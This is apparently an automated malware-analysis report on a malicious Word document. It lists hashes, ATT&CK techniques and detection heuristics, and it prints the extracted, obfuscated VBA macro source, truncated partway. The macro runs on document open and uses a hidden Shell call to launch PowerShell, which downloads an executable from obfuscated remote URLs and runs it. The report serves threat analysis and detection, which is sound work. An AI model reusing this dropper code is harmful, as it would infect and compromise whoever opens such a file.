Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef29e6287dca4497…

MALICIOUS

Office (OLE)

75.1 KB Created: 2018-09-07 20:00:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 85b59e75ea6c26254708aef1b31d741e SHA-1: c30f095de249721e7e097e291d7614150c8256ef SHA-256: ef29e6287dca4497bbe3b1847de9b667e71f5abf97c5fe59f309d79af3b0943f
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro utilizes the Shell() function to execute a command, indicating an attempt to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Valyria-6680539-0' further confirms its dropper functionality. No specific family could be identified.

Heuristics 5

  • ClamAV: Doc.Dropper.Valyria-6680539-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6680539-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6400 bytes
SHA-256: c3acee5d4900f4606352d171b672dba0ca017b6562eb03257433b5d685dd28f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ujcOoPiYTWFV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month CStr("NpOnzIbW" + "jasWCuwVinif" + "M" + "cZiLSv")
   Month CStr("55541650" + "FE" + "AHEYV" + "AkNa")
   Month CStr("upRKS" + "fQwCbRPGuBimW")
Shell CStr(FYuAjjzMc) + CStr(aiPEvFEm) + LkZObkLdh + KsviEl + DaSrItk + CStr(WtwqawpIWO) + CStr(KjcqRqRwdhiIP), CStr(vbHide)
   Month CStr("176198505" + "2450" + "ta" + "QKKXS")
   Month CStr("210" + "9969" + "3757" + "6046")
End Sub



Attribute VB_Name = "SjaqjNcavLZ"
Function LkZObkLdh()

On _
Error _
Resume _
Next
Month CStr("106756242" + "YCb" + "5167" + "4511")
   Month CStr("zR" + "l" + "2670" + "337497072")
zVORanoDl = Chr(14 + 1 + 15 + 10 + 59) + "md /" + "V/" + Chr(9 + 1 + 10 + 7 + 40) + Chr(4 + 0 + 4 + 3 + 23) + "^s^e^t" + " Zg7=" + "    " + " ^ ^ ^ " + "^ ^  ^ " + "^ " + "  ^  ^}" + "^}{" + "^h" + Chr(14 + 1 + 15 + 10 + 59) + "^t^a" + Chr(14 + 1 + 15 + 10 + 59) + "}" + ";^"
Month CStr("159" + "uKt")
   Month CStr("aDCTvWHHrm" + "fkO" + "146343771" + "wKL")
   Month CStr("101249983" + "JHXCJaFjGQAara")
   Month CStr("hEcDT" + "9262" + "107278517" + "VZGX")
tiJTnw = "k^a" + "^er^b;b" + "r^u$^ m" + "e^" + "t" + "I-ekov" + "nI;" + ")^" + "br^u^$"
Month CStr("3097" + "215574324")
   Month CStr("bYS" + "zJVRXAamm")
   Month CStr("500585246" + "7347" + "D" + "4914")
   Month CStr("8369" + "w" + "165388901" + "lbkurwSEnZO")
jjQLoUCuJn = "^" + " ," + Chr(14 + 1 + 15 + 10 + 59) + "F" + "^U^$(" + "eliF" + "^da^o^" + "lnw^o" + "^D." + "^XNN${^" + "y"
Month CStr("175478037" + "3644")
qtzSMBMca = "r^t^{" + ")J^jL^$" + "^ n" + "i^ " + Chr(14 + 1 + 15 + 10 + 59) + "^F^U" + "$(^" + "h" + Chr(14 + 1 + 15 + 10 + 59) + "aero" + "f"
Month CStr("MiWd" + "342098992" + "NH" + "491321784")
hGBKu = "^;" + "'^exe.'" + "^+t^" + "D^i$^+^" + "'" + "^\^"
Month CStr("CEpQBsfRz" + "228597851" + "VNaKIE" + "IAT")
   Month CStr("233023910" + "ILoOAjd")
   Month CStr("MVG" + "z" + "356565027" + "178147658")
   Month CStr("9764" + "jl" + "qwC" + "wNQbTYh")
vRlzFlSl = "'+" + Chr(14 + 1 + 15 + 10 + 59) + "i^lb^u^" + "p:v" + "n^e" + "$^=^br" + "^u$;" + "^'0^" + "6^6^" + "'^ = t" + "D^i$^;)"
Month CStr("oVDB" + "wdc")
mWPnQVUmZB = "^'" + "@^'(" + "^til^pS" + "^" + "." + "'^"
Month CStr("6076" + "mG" + "bHmzpifNzHQ" + "jhi")
   Month CStr("8736" + "274070288" + "6414" + "8025")
FKGOAjPH = "OR^ja^" + "4^DKVr^" + "5/" + "^sro^t" + Chr(14 + 1 + 15 + 10 + 59) + "^artno" + Chr(14 + 1 + 15 + 10 + 59) + ".l^a" + Chr(14 + 1 + 15 + 10 + 59) + "i" + "rt" + Chr(14 + 1 + 15 + 10 + 59) + "e^le"
Month CStr("520308106" + "jkLt")
   Month CStr("PLlz" + "ZM")
ZHzMaiaTw = "^e^ta^t" + "^s^" + "l^la//^" + ":p^" + "t^t^h" + "@"
Month CStr("7800" + "zRAKwHbV")
   Month CStr("ni" + "NGAYJqzk" + "CQqoQl" + "6184")
   Month CStr("7108" + "dMvuJConaB" + "250809323" + "NQCaS")
   Month CStr("426395423" + "jiE")
RSloZuuVj = "z5R" + "VO" + "^7" + "P^K/" + "^m^" + "o" + Chr(14 + 1 + 15 + 10 + 59) + ".^o^il" + "^o"
LkZObkLdh = zVORanoDl + tiJTnw + jjQLoUCuJn + qtzSMBMca + hGBKu + vRlzFlSl + mWPnQVUmZB + FKGOAjPH + ZHzMaiaTw + RSloZuuVj
   Month CStr("imAzkfN" + "4143" + "255296229" + "oNjw")
End Function
Function KsviEl()

On _
Error _
Resume _
Next
Month CStr("hpin" + "s" + "303103539" + "317284753")
   Month CStr("460604133" + "6481")
DjOIWILqa = "f" + "t" + "r^opv" + "e" + "w.^" + "i^l^" + "e" + Chr(14 + 1 + 15 + 10 + 59) + "n"
Month CStr("322188019" + "857" + "XCDaQzf" + "504105327")
hfpvOv = "efe^lb" + "^" + "a^i" + "^ler//" + ":^ptt^h" + "^" + "@g" + "^U^3" + "NZr^i" + "^1^" + "wj/" + "ku^."
Month CStr("UL" + "176118507" + "319836499" + "206203513")
   Month CStr("j" + "281291252")
   Month CStr("wb" + "3473")
zzNzHR = "^o" + Chr(14 + 1 + 15 + 10 + 59) + ".eni" + "^lno" + "-^esab^" + "-tsr^if" + "//" + "^:^p^t^" + "th^"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.